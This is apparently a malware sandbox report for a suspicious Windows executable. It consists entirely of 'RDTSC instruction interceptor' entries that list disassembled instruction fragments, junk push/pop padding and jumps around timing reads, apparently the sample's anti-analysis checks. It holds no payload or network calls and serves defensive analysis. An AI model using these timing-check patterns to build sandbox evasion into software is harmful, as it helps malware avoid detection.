Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7D6B second address: 11D7D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7D7B second address: 11D7D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7D7F second address: 11D7DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65CC527CA7h 0x0000000d jng 00007F65CC527C96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7DA4 second address: 11D7DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F65CD2EDEEAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F65CD2EDEF5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7DE1 second address: 11D7DE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8352 second address: 11D8358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8358 second address: 11D8377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527CA6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8377 second address: 11D837D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D837D second address: 11D838E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D838E second address: 11D8398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8398 second address: 11D839E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D839E second address: 11D83A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D83A2 second address: 11D83C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F65CC527CB4h 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F65CC527CA2h 0x00000015 pop esi 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D867F second address: 11D8683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8683 second address: 11D868F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D868F second address: 11D86A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEEFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D894C second address: 11D8968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8968 second address: 11D8980 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65CD2EDEE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c ja 00007F65CD2EDEE6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8980 second address: 11D8988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8F65 second address: 11D8F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEECh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D8F79 second address: 11D8F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F65CC527C9Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D9260 second address: 11D9270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F65CD2EDEE6h 0x0000000a jp 00007F65CD2EDEE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D9270 second address: 11D9274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D9274 second address: 11D928D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D928D second address: 11D9293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11DEE84 second address: 11DEE96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C35 second address: 11E2C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527CA2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C4B second address: 11E2C55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C55 second address: 11E2C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C61 second address: 11E2C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C68 second address: 11E2C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C6D second address: 11E2C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C73 second address: 11E2C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E2C79 second address: 11E2C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F65CD2EDEF2h 0x0000000b jo 00007F65CD2EDEE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E23E3 second address: 11E23E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E23E7 second address: 11E23FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11E27E6 second address: 11E27FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F65CC527C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F65CC527C98h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EA0EB second address: 11EA0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EA2E1 second address: 11EA305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F65CC527C98h 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F65CC527C9Eh 0x00000017 jl 00007F65CC527C96h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push esi 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EA733 second address: 11EA740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EA740 second address: 11EA744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EAA0F second address: 11EAA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EAA13 second address: 11EAA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EAB7A second address: 11EAB80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EAB80 second address: 11EAB99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EB6C3 second address: 11EB6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11EBDE8 second address: 11EBDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Ah 0x00000009 jne 00007F65CC527C96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F1897 second address: 11F18CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 jmp 00007F65CD2EDEF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F65CD2EDF06h 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F4B60 second address: 11F4B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F65CC527C9Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F4701 second address: 11F4709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F8410 second address: 11F8418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F8418 second address: 11F841D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F9B93 second address: 11F9BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007F65CC527C96h 0x0000000d jno 00007F65CC527C96h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F65CC527CA8h 0x0000001b jng 00007F65CC527C96h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11F9BC7 second address: 11F9BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEFh 0x00000007 jbe 00007F65CD2EDEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 popad 0x00000016 jg 00007F65CD2EDF15h 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f jns 00007F65CD2EDEE6h 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jnc 00007F65CD2EDEE6h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120C323 second address: 120C32F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120C32F second address: 120C343 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65CD2EDEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F65CD2EDEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120C343 second address: 120C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120C347 second address: 120C351 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120BD7F second address: 120BD9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F65CC527CA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120BD9D second address: 120BDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120BF5A second address: 120BF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120BF64 second address: 120BF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 120BF6C second address: 120BF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 12123DF second address: 12123E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 121F151 second address: 121F155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1223734 second address: 122373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 122373A second address: 1223749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F65CC527C9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1223896 second address: 12238AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF2h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1228274 second address: 1228286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1228286 second address: 12282BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F65CD2EDEEEh 0x0000000c jo 00007F65CD2EDEE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push edi 0x00000018 pop edi 0x00000019 jo 00007F65CD2EDEE6h 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F65CD2EDEEDh 0x00000026 jbe 00007F65CD2EDEE6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 12364D1 second address: 12364D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 12364D5 second address: 12364DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 123633A second address: 1236340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 12346CB second address: 12346CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 12346CF second address: 12346D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65CC527C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 12346D9 second address: 12346ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65CD2EDEEEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1247206 second address: 124721F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 124721F second address: 1247229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F65CD2EDEE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1247229 second address: 124723C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F65CC527CA4h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 124723C second address: 1247242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125B692 second address: 125B696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125A6A2 second address: 125A6C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F65CD2EDEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65CD2EDEF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F65CD2EDEE6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125A6C8 second address: 125A6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125AAE8 second address: 125AAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125AC76 second address: 125AC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125CE25 second address: 125CE3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 jnp 00007F65CD2EDEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125CE3A second address: 125CE47 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65CC527C98h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 125FA55 second address: 125FA8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F65CD2EDEE8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dh, ah 0x00000025 push 00000004h 0x00000027 mov dx, cx 0x0000002a push A16995A6h 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jnp 00007F65CD2EDEE6h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 1178439 second address: 117843F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1178651 second address: 1178655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1178655 second address: 117865B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0405 second address: 56F0417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEEh 0x00000009 rdtsc
